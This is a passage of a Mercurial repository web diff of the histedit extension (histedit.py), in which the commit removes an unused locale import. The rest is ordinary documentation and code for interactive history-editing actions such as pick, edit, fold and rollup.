##// END OF EJS Templates
curses: do not initialize LC_ALL to user settings (issue6358)...
Manuel Jacob -
r45550:1bab6b61 stable
parent child Browse files
Show More
@@ -1,2644 +1,2640 b''
1 1 # histedit.py - interactive history editing for mercurial
2 2 #
3 3 # Copyright 2009 Augie Fackler <raf@durin42.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 """interactive history editing
8 8
9 9 With this extension installed, Mercurial gains one new command: histedit. Usage
10 10 is as follows, assuming the following history::
11 11
12 12 @ 3[tip] 7c2fd3b9020c 2009-04-27 18:04 -0500 durin42
13 13 | Add delta
14 14 |
15 15 o 2 030b686bedc4 2009-04-27 18:04 -0500 durin42
16 16 | Add gamma
17 17 |
18 18 o 1 c561b4e977df 2009-04-27 18:04 -0500 durin42
19 19 | Add beta
20 20 |
21 21 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
22 22 Add alpha
23 23
24 24 If you were to run ``hg histedit c561b4e977df``, you would see the following
25 25 file open in your editor::
26 26
27 27 pick c561b4e977df Add beta
28 28 pick 030b686bedc4 Add gamma
29 29 pick 7c2fd3b9020c Add delta
30 30
31 31 # Edit history between c561b4e977df and 7c2fd3b9020c
32 32 #
33 33 # Commits are listed from least to most recent
34 34 #
35 35 # Commands:
36 36 # p, pick = use commit
37 37 # e, edit = use commit, but stop for amending
38 38 # f, fold = use commit, but combine it with the one above
39 39 # r, roll = like fold, but discard this commit's description and date
40 40 # d, drop = remove commit from history
41 41 # m, mess = edit commit message without changing commit content
42 42 # b, base = checkout changeset and apply further changesets from there
43 43 #
44 44
45 45 In this file, lines beginning with ``#`` are ignored. You must specify a rule
46 46 for each revision in your history. For example, if you had meant to add gamma
47 47 before beta, and then wanted to add delta in the same revision as beta, you
48 48 would reorganize the file to look like this::
49 49
50 50 pick 030b686bedc4 Add gamma
51 51 pick c561b4e977df Add beta
52 52 fold 7c2fd3b9020c Add delta
53 53
54 54 # Edit history between c561b4e977df and 7c2fd3b9020c
55 55 #
56 56 # Commits are listed from least to most recent
57 57 #
58 58 # Commands:
59 59 # p, pick = use commit
60 60 # e, edit = use commit, but stop for amending
61 61 # f, fold = use commit, but combine it with the one above
62 62 # r, roll = like fold, but discard this commit's description and date
63 63 # d, drop = remove commit from history
64 64 # m, mess = edit commit message without changing commit content
65 65 # b, base = checkout changeset and apply further changesets from there
66 66 #
67 67
68 68 At which point you close the editor and ``histedit`` starts working. When you
69 69 specify a ``fold`` operation, ``histedit`` will open an editor when it folds
70 70 those revisions together, offering you a chance to clean up the commit message::
71 71
72 72 Add beta
73 73 ***
74 74 Add delta
75 75
76 76 Edit the commit message to your liking, then close the editor. The date used
77 77 for the commit will be the later of the two commits' dates. For this example,
78 78 let's assume that the commit message was changed to ``Add beta and delta.``
79 79 After histedit has run and had a chance to remove any old or temporary
80 80 revisions it needed, the history looks like this::
81 81
82 82 @ 2[tip] 989b4d060121 2009-04-27 18:04 -0500 durin42
83 83 | Add beta and delta.
84 84 |
85 85 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
86 86 | Add gamma
87 87 |
88 88 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
89 89 Add alpha
90 90
91 91 Note that ``histedit`` does *not* remove any revisions (even its own temporary
92 92 ones) until after it has completed all the editing operations, so it will
93 93 probably perform several strip operations when it's done. For the above example,
94 94 it had to run strip twice. Strip can be slow depending on a variety of factors,
95 95 so you might need to be a little patient. You can choose to keep the original
96 96 revisions by passing the ``--keep`` flag.
97 97
98 98 The ``edit`` operation will drop you back to a command prompt,
99 99 allowing you to edit files freely, or even use ``hg record`` to commit
100 100 some changes as a separate commit. When you're done, any remaining
101 101 uncommitted changes will be committed as well. When done, run ``hg
102 102 histedit --continue`` to finish this step. If there are uncommitted
103 103 changes, you'll be prompted for a new commit message, but the default
104 104 commit message will be the original message for the ``edit`` ed
105 105 revision, and the date of the original commit will be preserved.
106 106
107 107 The ``message`` operation will give you a chance to revise a commit
108 108 message without changing the contents. It's a shortcut for doing
109 109 ``edit`` immediately followed by `hg histedit --continue``.
110 110
111 111 If ``histedit`` encounters a conflict when moving a revision (while
112 112 handling ``pick`` or ``fold``), it'll stop in a similar manner to
113 113 ``edit`` with the difference that it won't prompt you for a commit
114 114 message when done. If you decide at this point that you don't like how
115 115 much work it will be to rearrange history, or that you made a mistake,
116 116 you can use ``hg histedit --abort`` to abandon the new changes you
117 117 have made and return to the state before you attempted to edit your
118 118 history.
119 119
120 120 If we clone the histedit-ed example repository above and add four more
121 121 changes, such that we have the following history::
122 122
123 123 @ 6[tip] 038383181893 2009-04-27 18:04 -0500 stefan
124 124 | Add theta
125 125 |
126 126 o 5 140988835471 2009-04-27 18:04 -0500 stefan
127 127 | Add eta
128 128 |
129 129 o 4 122930637314 2009-04-27 18:04 -0500 stefan
130 130 | Add zeta
131 131 |
132 132 o 3 836302820282 2009-04-27 18:04 -0500 stefan
133 133 | Add epsilon
134 134 |
135 135 o 2 989b4d060121 2009-04-27 18:04 -0500 durin42
136 136 | Add beta and delta.
137 137 |
138 138 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
139 139 | Add gamma
140 140 |
141 141 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
142 142 Add alpha
143 143
144 144 If you run ``hg histedit --outgoing`` on the clone then it is the same
145 145 as running ``hg histedit 836302820282``. If you need plan to push to a
146 146 repository that Mercurial does not detect to be related to the source
147 147 repo, you can add a ``--force`` option.
148 148
149 149 Config
150 150 ------
151 151
152 152 Histedit rule lines are truncated to 80 characters by default. You
153 153 can customize this behavior by setting a different length in your
154 154 configuration file::
155 155
156 156 [histedit]
157 157 linelen = 120 # truncate rule lines at 120 characters
158 158
159 159 The summary of a change can be customized as well::
160 160
161 161 [histedit]
162 162 summary-template = '{rev} {bookmarks} {desc|firstline}'
163 163
164 164 The customized summary should be kept short enough that rule lines
165 165 will fit in the configured line length. See above if that requires
166 166 customization.
167 167
168 168 ``hg histedit`` attempts to automatically choose an appropriate base
169 169 revision to use. To change which base revision is used, define a
170 170 revset in your configuration file::
171 171
172 172 [histedit]
173 173 defaultrev = only(.) & draft()
174 174
175 175 By default each edited revision needs to be present in histedit commands.
176 176 To remove revision you need to use ``drop`` operation. You can configure
177 177 the drop to be implicit for missing commits by adding::
178 178
179 179 [histedit]
180 180 dropmissing = True
181 181
182 182 By default, histedit will close the transaction after each action. For
183 183 performance purposes, you can configure histedit to use a single transaction
184 184 across the entire histedit. WARNING: This setting introduces a significant risk
185 185 of losing the work you've done in a histedit if the histedit aborts
186 186 unexpectedly::
187 187
188 188 [histedit]
189 189 singletransaction = True
190 190
191 191 """
192 192
193 193 from __future__ import absolute_import
194 194
195 195 # chistedit dependencies that are not available everywhere
196 196 try:
197 197 import fcntl
198 198 import termios
199 199 except ImportError:
200 200 fcntl = None
201 201 termios = None
202 202
203 203 import functools
204 import locale
205 204 import os
206 205 import struct
207 206
208 207 from mercurial.i18n import _
209 208 from mercurial.pycompat import (
210 209 getattr,
211 210 open,
212 211 )
213 212 from mercurial import (
214 213 bundle2,
215 214 cmdutil,
216 215 context,
217 216 copies,
218 217 destutil,
219 218 discovery,
220 219 encoding,
221 220 error,
222 221 exchange,
223 222 extensions,
224 223 hg,
225 224 logcmdutil,
226 225 merge as mergemod,
227 226 mergeutil,
228 227 node,
229 228 obsolete,
230 229 pycompat,
231 230 registrar,
232 231 repair,
233 232 rewriteutil,
234 233 scmutil,
235 234 state as statemod,
236 235 util,
237 236 )
238 237 from mercurial.utils import (
239 238 dateutil,
240 239 stringutil,
241 240 )
242 241
243 242 pickle = util.pickle
244 243 cmdtable = {}
245 244 command = registrar.command(cmdtable)
246 245
247 246 configtable = {}
248 247 configitem = registrar.configitem(configtable)
249 248 configitem(
250 249 b'experimental', b'histedit.autoverb', default=False,
251 250 )
252 251 configitem(
253 252 b'histedit', b'defaultrev', default=None,
254 253 )
255 254 configitem(
256 255 b'histedit', b'dropmissing', default=False,
257 256 )
258 257 configitem(
259 258 b'histedit', b'linelen', default=80,
260 259 )
261 260 configitem(
262 261 b'histedit', b'singletransaction', default=False,
263 262 )
264 263 configitem(
265 264 b'ui', b'interface.histedit', default=None,
266 265 )
267 266 configitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')
268 267
269 268 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
270 269 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
271 270 # be specifying the version(s) of Mercurial they are tested with, or
272 271 # leave the attribute unspecified.
273 272 testedwith = b'ships-with-hg-core'
274 273
275 274 actiontable = {}
276 275 primaryactions = set()
277 276 secondaryactions = set()
278 277 tertiaryactions = set()
279 278 internalactions = set()
280 279
281 280
282 281 def geteditcomment(ui, first, last):
283 282 """ construct the editor comment
284 283 The comment includes::
285 284 - an intro
286 285 - sorted primary commands
287 286 - sorted short commands
288 287 - sorted long commands
289 288 - additional hints
290 289
291 290 Commands are only included once.
292 291 """
293 292 intro = _(
294 293 b"""Edit history between %s and %s
295 294
296 295 Commits are listed from least to most recent
297 296
298 297 You can reorder changesets by reordering the lines
299 298
300 299 Commands:
301 300 """
302 301 )
303 302 actions = []
304 303
305 304 def addverb(v):
306 305 a = actiontable[v]
307 306 lines = a.message.split(b"\n")
308 307 if len(a.verbs):
309 308 v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))
310 309 actions.append(b" %s = %s" % (v, lines[0]))
311 310 actions.extend([b' %s'] * (len(lines) - 1))
312 311
313 312 for v in (
314 313 sorted(primaryactions)
315 314 + sorted(secondaryactions)
316 315 + sorted(tertiaryactions)
317 316 ):
318 317 addverb(v)
319 318 actions.append(b'')
320 319
321 320 hints = []
322 321 if ui.configbool(b'histedit', b'dropmissing'):
323 322 hints.append(
324 323 b"Deleting a changeset from the list "
325 324 b"will DISCARD it from the edited history!"
326 325 )
327 326
328 327 lines = (intro % (first, last)).split(b'\n') + actions + hints
329 328
330 329 return b''.join([b'# %s\n' % l if l else b'#\n' for l in lines])
331 330
332 331
333 332 class histeditstate(object):
334 333 def __init__(self, repo):
335 334 self.repo = repo
336 335 self.actions = None
337 336 self.keep = None
338 337 self.topmost = None
339 338 self.parentctxnode = None
340 339 self.lock = None
341 340 self.wlock = None
342 341 self.backupfile = None
343 342 self.stateobj = statemod.cmdstate(repo, b'histedit-state')
344 343 self.replacements = []
345 344
346 345 def read(self):
347 346 """Load histedit state from disk and set fields appropriately."""
348 347 if not self.stateobj.exists():
349 348 cmdutil.wrongtooltocontinue(self.repo, _(b'histedit'))
350 349
351 350 data = self._read()
352 351
353 352 self.parentctxnode = data[b'parentctxnode']
354 353 actions = parserules(data[b'rules'], self)
355 354 self.actions = actions
356 355 self.keep = data[b'keep']
357 356 self.topmost = data[b'topmost']
358 357 self.replacements = data[b'replacements']
359 358 self.backupfile = data[b'backupfile']
360 359
361 360 def _read(self):
362 361 fp = self.repo.vfs.read(b'histedit-state')
363 362 if fp.startswith(b'v1\n'):
364 363 data = self._load()
365 364 parentctxnode, rules, keep, topmost, replacements, backupfile = data
366 365 else:
367 366 data = pickle.loads(fp)
368 367 parentctxnode, rules, keep, topmost, replacements = data
369 368 backupfile = None
370 369 rules = b"\n".join([b"%s %s" % (verb, rest) for [verb, rest] in rules])
371 370
372 371 return {
373 372 b'parentctxnode': parentctxnode,
374 373 b"rules": rules,
375 374 b"keep": keep,
376 375 b"topmost": topmost,
377 376 b"replacements": replacements,
378 377 b"backupfile": backupfile,
379 378 }
380 379
381 380 def write(self, tr=None):
382 381 if tr:
383 382 tr.addfilegenerator(
384 383 b'histedit-state',
385 384 (b'histedit-state',),
386 385 self._write,
387 386 location=b'plain',
388 387 )
389 388 else:
390 389 with self.repo.vfs(b"histedit-state", b"w") as f:
391 390 self._write(f)
392 391
393 392 def _write(self, fp):
394 393 fp.write(b'v1\n')
395 394 fp.write(b'%s\n' % node.hex(self.parentctxnode))
396 395 fp.write(b'%s\n' % node.hex(self.topmost))
397 396 fp.write(b'%s\n' % (b'True' if self.keep else b'False'))
398 397 fp.write(b'%d\n' % len(self.actions))
399 398 for action in self.actions:
400 399 fp.write(b'%s\n' % action.tostate())
401 400 fp.write(b'%d\n' % len(self.replacements))
402 401 for replacement in self.replacements:
403 402 fp.write(
404 403 b'%s%s\n'
405 404 % (
406 405 node.hex(replacement[0]),
407 406 b''.join(node.hex(r) for r in replacement[1]),
408 407 )
409 408 )
410 409 backupfile = self.backupfile
411 410 if not backupfile:
412 411 backupfile = b''
413 412 fp.write(b'%s\n' % backupfile)
414 413
415 414 def _load(self):
416 415 fp = self.repo.vfs(b'histedit-state', b'r')
417 416 lines = [l[:-1] for l in fp.readlines()]
418 417
419 418 index = 0
420 419 lines[index] # version number
421 420 index += 1
422 421
423 422 parentctxnode = node.bin(lines[index])
424 423 index += 1
425 424
426 425 topmost = node.bin(lines[index])
427 426 index += 1
428 427
429 428 keep = lines[index] == b'True'
430 429 index += 1
431 430
432 431 # Rules
433 432 rules = []
434 433 rulelen = int(lines[index])
435 434 index += 1
436 435 for i in pycompat.xrange(rulelen):
437 436 ruleaction = lines[index]
438 437 index += 1
439 438 rule = lines[index]
440 439 index += 1
441 440 rules.append((ruleaction, rule))
442 441
443 442 # Replacements
444 443 replacements = []
445 444 replacementlen = int(lines[index])
446 445 index += 1
447 446 for i in pycompat.xrange(replacementlen):
448 447 replacement = lines[index]
449 448 original = node.bin(replacement[:40])
450 449 succ = [
451 450 node.bin(replacement[i : i + 40])
452 451 for i in range(40, len(replacement), 40)
453 452 ]
454 453 replacements.append((original, succ))
455 454 index += 1
456 455
457 456 backupfile = lines[index]
458 457 index += 1
459 458
460 459 fp.close()
461 460
462 461 return parentctxnode, rules, keep, topmost, replacements, backupfile
463 462
464 463 def clear(self):
465 464 if self.inprogress():
466 465 self.repo.vfs.unlink(b'histedit-state')
467 466
468 467 def inprogress(self):
469 468 return self.repo.vfs.exists(b'histedit-state')
470 469
471 470
472 471 class histeditaction(object):
473 472 def __init__(self, state, node):
474 473 self.state = state
475 474 self.repo = state.repo
476 475 self.node = node
477 476
478 477 @classmethod
479 478 def fromrule(cls, state, rule):
480 479 """Parses the given rule, returning an instance of the histeditaction.
481 480 """
482 481 ruleid = rule.strip().split(b' ', 1)[0]
483 482 # ruleid can be anything from rev numbers, hashes, "bookmarks" etc
484 483 # Check for validation of rule ids and get the rulehash
485 484 try:
486 485 rev = node.bin(ruleid)
487 486 except TypeError:
488 487 try:
489 488 _ctx = scmutil.revsingle(state.repo, ruleid)
490 489 rulehash = _ctx.hex()
491 490 rev = node.bin(rulehash)
492 491 except error.RepoLookupError:
493 492 raise error.ParseError(_(b"invalid changeset %s") % ruleid)
494 493 return cls(state, rev)
495 494
496 495 def verify(self, prev, expected, seen):
497 496 """ Verifies semantic correctness of the rule"""
498 497 repo = self.repo
499 498 ha = node.hex(self.node)
500 499 self.node = scmutil.resolvehexnodeidprefix(repo, ha)
501 500 if self.node is None:
502 501 raise error.ParseError(_(b'unknown changeset %s listed') % ha[:12])
503 502 self._verifynodeconstraints(prev, expected, seen)
504 503
505 504 def _verifynodeconstraints(self, prev, expected, seen):
506 505 # by default command need a node in the edited list
507 506 if self.node not in expected:
508 507 raise error.ParseError(
509 508 _(b'%s "%s" changeset was not a candidate')
510 509 % (self.verb, node.short(self.node)),
511 510 hint=_(b'only use listed changesets'),
512 511 )
513 512 # and only one command per node
514 513 if self.node in seen:
515 514 raise error.ParseError(
516 515 _(b'duplicated command for changeset %s')
517 516 % node.short(self.node)
518 517 )
519 518
520 519 def torule(self):
521 520 """build a histedit rule line for an action
522 521
523 522 by default lines are in the form:
524 523 <hash> <rev> <summary>
525 524 """
526 525 ctx = self.repo[self.node]
527 526 ui = self.repo.ui
528 527 summary = (
529 528 cmdutil.rendertemplate(
530 529 ctx, ui.config(b'histedit', b'summary-template')
531 530 )
532 531 or b''
533 532 )
534 533 summary = summary.splitlines()[0]
535 534 line = b'%s %s %s' % (self.verb, ctx, summary)
536 535 # trim to 75 columns by default so it's not stupidly wide in my editor
537 536 # (the 5 more are left for verb)
538 537 maxlen = self.repo.ui.configint(b'histedit', b'linelen')
539 538 maxlen = max(maxlen, 22) # avoid truncating hash
540 539 return stringutil.ellipsis(line, maxlen)
541 540
542 541 def tostate(self):
543 542 """Print an action in format used by histedit state files
544 543 (the first line is a verb, the remainder is the second)
545 544 """
546 545 return b"%s\n%s" % (self.verb, node.hex(self.node))
547 546
548 547 def run(self):
549 548 """Runs the action. The default behavior is simply apply the action's
550 549 rulectx onto the current parentctx."""
551 550 self.applychange()
552 551 self.continuedirty()
553 552 return self.continueclean()
554 553
555 554 def applychange(self):
556 555 """Applies the changes from this action's rulectx onto the current
557 556 parentctx, but does not commit them."""
558 557 repo = self.repo
559 558 rulectx = repo[self.node]
560 559 repo.ui.pushbuffer(error=True, labeled=True)
561 560 hg.update(repo, self.state.parentctxnode, quietempty=True)
562 561 repo.ui.popbuffer()
563 562 stats = applychanges(repo.ui, repo, rulectx, {})
564 563 repo.dirstate.setbranch(rulectx.branch())
565 564 if stats.unresolvedcount:
566 565 raise error.InterventionRequired(
567 566 _(b'Fix up the change (%s %s)')
568 567 % (self.verb, node.short(self.node)),
569 568 hint=_(b'hg histedit --continue to resume'),
570 569 )
571 570
572 571 def continuedirty(self):
573 572 """Continues the action when changes have been applied to the working
574 573 copy. The default behavior is to commit the dirty changes."""
575 574 repo = self.repo
576 575 rulectx = repo[self.node]
577 576
578 577 editor = self.commiteditor()
579 578 commit = commitfuncfor(repo, rulectx)
580 579 if repo.ui.configbool(b'rewrite', b'update-timestamp'):
581 580 date = dateutil.makedate()
582 581 else:
583 582 date = rulectx.date()
584 583 commit(
585 584 text=rulectx.description(),
586 585 user=rulectx.user(),
587 586 date=date,
588 587 extra=rulectx.extra(),
589 588 editor=editor,
590 589 )
591 590
592 591 def commiteditor(self):
593 592 """The editor to be used to edit the commit message."""
594 593 return False
595 594
596 595 def continueclean(self):
597 596 """Continues the action when the working copy is clean. The default
598 597 behavior is to accept the current commit as the new version of the
599 598 rulectx."""
600 599 ctx = self.repo[b'.']
601 600 if ctx.node() == self.state.parentctxnode:
602 601 self.repo.ui.warn(
603 602 _(b'%s: skipping changeset (no changes)\n')
604 603 % node.short(self.node)
605 604 )
606 605 return ctx, [(self.node, tuple())]
607 606 if ctx.node() == self.node:
608 607 # Nothing changed
609 608 return ctx, []
610 609 return ctx, [(self.node, (ctx.node(),))]
611 610
612 611
613 612 def commitfuncfor(repo, src):
614 613 """Build a commit function for the replacement of <src>
615 614
616 615 This function ensure we apply the same treatment to all changesets.
617 616
618 617 - Add a 'histedit_source' entry in extra.
619 618
620 619 Note that fold has its own separated logic because its handling is a bit
621 620 different and not easily factored out of the fold method.
622 621 """
623 622 phasemin = src.phase()
624 623
625 624 def commitfunc(**kwargs):
626 625 overrides = {(b'phases', b'new-commit'): phasemin}
627 626 with repo.ui.configoverride(overrides, b'histedit'):
628 627 extra = kwargs.get('extra', {}).copy()
629 628 extra[b'histedit_source'] = src.hex()
630 629 kwargs['extra'] = extra
631 630 return repo.commit(**kwargs)
632 631
633 632 return commitfunc
634 633
635 634
636 635 def applychanges(ui, repo, ctx, opts):
637 636 """Merge changeset from ctx (only) in the current working directory"""
638 637 wcpar = repo.dirstate.p1()
639 638 if ctx.p1().node() == wcpar:
640 639 # edits are "in place" we do not need to make any merge,
641 640 # just applies changes on parent for editing
642 641 ui.pushbuffer()
643 642 cmdutil.revert(ui, repo, ctx, (wcpar, node.nullid), all=True)
644 643 stats = mergemod.updateresult(0, 0, 0, 0)
645 644 ui.popbuffer()
646 645 else:
647 646 try:
648 647 # ui.forcemerge is an internal variable, do not document
649 648 repo.ui.setconfig(
650 649 b'ui', b'forcemerge', opts.get(b'tool', b''), b'histedit'
651 650 )
652 651 stats = mergemod.graft(repo, ctx, labels=[b'local', b'histedit'])
653 652 finally:
654 653 repo.ui.setconfig(b'ui', b'forcemerge', b'', b'histedit')
655 654 return stats
656 655
657 656
658 657 def collapse(repo, firstctx, lastctx, commitopts, skipprompt=False):
659 658 """collapse the set of revisions from first to last as new one.
660 659
661 660 Expected commit options are:
662 661 - message
663 662 - date
664 663 - username
665 664 Commit message is edited in all cases.
666 665
667 666 This function works in memory."""
668 667 ctxs = list(repo.set(b'%d::%d', firstctx.rev(), lastctx.rev()))
669 668 if not ctxs:
670 669 return None
671 670 for c in ctxs:
672 671 if not c.mutable():
673 672 raise error.ParseError(
674 673 _(b"cannot fold into public change %s") % node.short(c.node())
675 674 )
676 675 base = firstctx.p1()
677 676
678 677 # commit a new version of the old changeset, including the update
679 678 # collect all files which might be affected
680 679 files = set()
681 680 for ctx in ctxs:
682 681 files.update(ctx.files())
683 682
684 683 # Recompute copies (avoid recording a -> b -> a)
685 684 copied = copies.pathcopies(base, lastctx)
686 685
687 686 # prune files which were reverted by the updates
688 687 files = [f for f in files if not cmdutil.samefile(f, lastctx, base)]
689 688 # commit version of these files as defined by head
690 689 headmf = lastctx.manifest()
691 690
692 691 def filectxfn(repo, ctx, path):
693 692 if path in headmf:
694 693 fctx = lastctx[path]
695 694 flags = fctx.flags()
696 695 mctx = context.memfilectx(
697 696 repo,
698 697 ctx,
699 698 fctx.path(),
700 699 fctx.data(),
701 700 islink=b'l' in flags,
702 701 isexec=b'x' in flags,
703 702 copysource=copied.get(path),
704 703 )
705 704 return mctx
706 705 return None
707 706
708 707 if commitopts.get(b'message'):
709 708 message = commitopts[b'message']
710 709 else:
711 710 message = firstctx.description()
712 711 user = commitopts.get(b'user')
713 712 date = commitopts.get(b'date')
714 713 extra = commitopts.get(b'extra')
715 714
716 715 parents = (firstctx.p1().node(), firstctx.p2().node())
717 716 editor = None
718 717 if not skipprompt:
719 718 editor = cmdutil.getcommiteditor(edit=True, editform=b'histedit.fold')
720 719 new = context.memctx(
721 720 repo,
722 721 parents=parents,
723 722 text=message,
724 723 files=files,
725 724 filectxfn=filectxfn,
726 725 user=user,
727 726 date=date,
728 727 extra=extra,
729 728 editor=editor,
730 729 )
731 730 return repo.commitctx(new)
732 731
733 732
734 733 def _isdirtywc(repo):
735 734 return repo[None].dirty(missing=True)
736 735
737 736
738 737 def abortdirty():
739 738 raise error.Abort(
740 739 _(b'working copy has pending changes'),
741 740 hint=_(
742 741 b'amend, commit, or revert them and run histedit '
743 742 b'--continue, or abort with histedit --abort'
744 743 ),
745 744 )
746 745
747 746
748 747 def action(verbs, message, priority=False, internal=False):
749 748 def wrap(cls):
750 749 assert not priority or not internal
751 750 verb = verbs[0]
752 751 if priority:
753 752 primaryactions.add(verb)
754 753 elif internal:
755 754 internalactions.add(verb)
756 755 elif len(verbs) > 1:
757 756 secondaryactions.add(verb)
758 757 else:
759 758 tertiaryactions.add(verb)
760 759
761 760 cls.verb = verb
762 761 cls.verbs = verbs
763 762 cls.message = message
764 763 for verb in verbs:
765 764 actiontable[verb] = cls
766 765 return cls
767 766
768 767 return wrap
769 768
770 769
771 770 @action([b'pick', b'p'], _(b'use commit'), priority=True)
772 771 class pick(histeditaction):
773 772 def run(self):
774 773 rulectx = self.repo[self.node]
775 774 if rulectx.p1().node() == self.state.parentctxnode:
776 775 self.repo.ui.debug(b'node %s unchanged\n' % node.short(self.node))
777 776 return rulectx, []
778 777
779 778 return super(pick, self).run()
780 779
781 780
782 781 @action([b'edit', b'e'], _(b'use commit, but stop for amending'), priority=True)
783 782 class edit(histeditaction):
784 783 def run(self):
785 784 repo = self.repo
786 785 rulectx = repo[self.node]
787 786 hg.update(repo, self.state.parentctxnode, quietempty=True)
788 787 applychanges(repo.ui, repo, rulectx, {})
789 788 raise error.InterventionRequired(
790 789 _(b'Editing (%s), you may commit or record as needed now.')
791 790 % node.short(self.node),
792 791 hint=_(b'hg histedit --continue to resume'),
793 792 )
794 793
795 794 def commiteditor(self):
796 795 return cmdutil.getcommiteditor(edit=True, editform=b'histedit.edit')
797 796
798 797
799 798 @action([b'fold', b'f'], _(b'use commit, but combine it with the one above'))
800 799 class fold(histeditaction):
801 800 def verify(self, prev, expected, seen):
802 801 """ Verifies semantic correctness of the fold rule"""
803 802 super(fold, self).verify(prev, expected, seen)
804 803 repo = self.repo
805 804 if not prev:
806 805 c = repo[self.node].p1()
807 806 elif not prev.verb in (b'pick', b'base'):
808 807 return
809 808 else:
810 809 c = repo[prev.node]
811 810 if not c.mutable():
812 811 raise error.ParseError(
813 812 _(b"cannot fold into public change %s") % node.short(c.node())
814 813 )
815 814
816 815 def continuedirty(self):
817 816 repo = self.repo
818 817 rulectx = repo[self.node]
819 818
820 819 commit = commitfuncfor(repo, rulectx)
821 820 commit(
822 821 text=b'fold-temp-revision %s' % node.short(self.node),
823 822 user=rulectx.user(),
824 823 date=rulectx.date(),
825 824 extra=rulectx.extra(),
826 825 )
827 826
828 827 def continueclean(self):
829 828 repo = self.repo
830 829 ctx = repo[b'.']
831 830 rulectx = repo[self.node]
832 831 parentctxnode = self.state.parentctxnode
833 832 if ctx.node() == parentctxnode:
834 833 repo.ui.warn(_(b'%s: empty changeset\n') % node.short(self.node))
835 834 return ctx, [(self.node, (parentctxnode,))]
836 835
837 836 parentctx = repo[parentctxnode]
838 837 newcommits = {
839 838 c.node()
840 839 for c in repo.set(b'(%d::. - %d)', parentctx.rev(), parentctx.rev())
841 840 }
842 841 if not newcommits:
843 842 repo.ui.warn(
844 843 _(
845 844 b'%s: cannot fold - working copy is not a '
846 845 b'descendant of previous commit %s\n'
847 846 )
848 847 % (node.short(self.node), node.short(parentctxnode))
849 848 )
850 849 return ctx, [(self.node, (ctx.node(),))]
851 850
852 851 middlecommits = newcommits.copy()
853 852 middlecommits.discard(ctx.node())
854 853
855 854 return self.finishfold(
856 855 repo.ui, repo, parentctx, rulectx, ctx.node(), middlecommits
857 856 )
858 857
859 858 def skipprompt(self):
860 859 """Returns true if the rule should skip the message editor.
861 860
862 861 For example, 'fold' wants to show an editor, but 'rollup'
863 862 doesn't want to.
864 863 """
865 864 return False
866 865
867 866 def mergedescs(self):
868 867 """Returns true if the rule should merge messages of multiple changes.
869 868
870 869 This exists mainly so that 'rollup' rules can be a subclass of
871 870 'fold'.
872 871 """
873 872 return True
874 873
875 874 def firstdate(self):
876 875 """Returns true if the rule should preserve the date of the first
877 876 change.
878 877
879 878 This exists mainly so that 'rollup' rules can be a subclass of
880 879 'fold'.
881 880 """
882 881 return False
883 882
884 883 def finishfold(self, ui, repo, ctx, oldctx, newnode, internalchanges):
885 884 parent = ctx.p1().node()
886 885 hg.updaterepo(repo, parent, overwrite=False)
887 886 ### prepare new commit data
888 887 commitopts = {}
889 888 commitopts[b'user'] = ctx.user()
890 889 # commit message
891 890 if not self.mergedescs():
892 891 newmessage = ctx.description()
893 892 else:
894 893 newmessage = (
895 894 b'\n***\n'.join(
896 895 [ctx.description()]
897 896 + [repo[r].description() for r in internalchanges]
898 897 + [oldctx.description()]
899 898 )
900 899 + b'\n'
901 900 )
902 901 commitopts[b'message'] = newmessage
903 902 # date
904 903 if self.firstdate():
905 904 commitopts[b'date'] = ctx.date()
906 905 else:
907 906 commitopts[b'date'] = max(ctx.date(), oldctx.date())
908 907 # if date is to be updated to current
909 908 if ui.configbool(b'rewrite', b'update-timestamp'):
910 909 commitopts[b'date'] = dateutil.makedate()
911 910
912 911 extra = ctx.extra().copy()
913 912 # histedit_source
914 913 # note: ctx is likely a temporary commit but that the best we can do
915 914 # here. This is sufficient to solve issue3681 anyway.
916 915 extra[b'histedit_source'] = b'%s,%s' % (ctx.hex(), oldctx.hex())
917 916 commitopts[b'extra'] = extra
918 917 phasemin = max(ctx.phase(), oldctx.phase())
919 918 overrides = {(b'phases', b'new-commit'): phasemin}
920 919 with repo.ui.configoverride(overrides, b'histedit'):
921 920 n = collapse(
922 921 repo,
923 922 ctx,
924 923 repo[newnode],
925 924 commitopts,
926 925 skipprompt=self.skipprompt(),
927 926 )
928 927 if n is None:
929 928 return ctx, []
930 929 hg.updaterepo(repo, n, overwrite=False)
931 930 replacements = [
932 931 (oldctx.node(), (newnode,)),
933 932 (ctx.node(), (n,)),
934 933 (newnode, (n,)),
935 934 ]
936 935 for ich in internalchanges:
937 936 replacements.append((ich, (n,)))
938 937 return repo[n], replacements
939 938
940 939
941 940 @action(
942 941 [b'base', b'b'],
943 942 _(b'checkout changeset and apply further changesets from there'),
944 943 )
945 944 class base(histeditaction):
946 945 def run(self):
947 946 if self.repo[b'.'].node() != self.node:
948 947 mergemod.clean_update(self.repo[self.node])
949 948 return self.continueclean()
950 949
951 950 def continuedirty(self):
952 951 abortdirty()
953 952
954 953 def continueclean(self):
955 954 basectx = self.repo[b'.']
956 955 return basectx, []
957 956
958 957 def _verifynodeconstraints(self, prev, expected, seen):
959 958 # base can only be use with a node not in the edited set
960 959 if self.node in expected:
961 960 msg = _(b'%s "%s" changeset was an edited list candidate')
962 961 raise error.ParseError(
963 962 msg % (self.verb, node.short(self.node)),
964 963 hint=_(b'base must only use unlisted changesets'),
965 964 )
966 965
967 966
968 967 @action(
969 968 [b'_multifold'],
970 969 _(
971 970 """fold subclass used for when multiple folds happen in a row
972 971
973 972 We only want to fire the editor for the folded message once when
974 973 (say) four changes are folded down into a single change. This is
975 974 similar to rollup, but we should preserve both messages so that
976 975 when the last fold operation runs we can show the user all the
977 976 commit messages in their editor.
978 977 """
979 978 ),
980 979 internal=True,
981 980 )
982 981 class _multifold(fold):
983 982 def skipprompt(self):
984 983 return True
985 984
986 985
987 986 @action(
988 987 [b"roll", b"r"],
989 988 _(b"like fold, but discard this commit's description and date"),
990 989 )
991 990 class rollup(fold):
992 991 def mergedescs(self):
993 992 return False
994 993
995 994 def skipprompt(self):
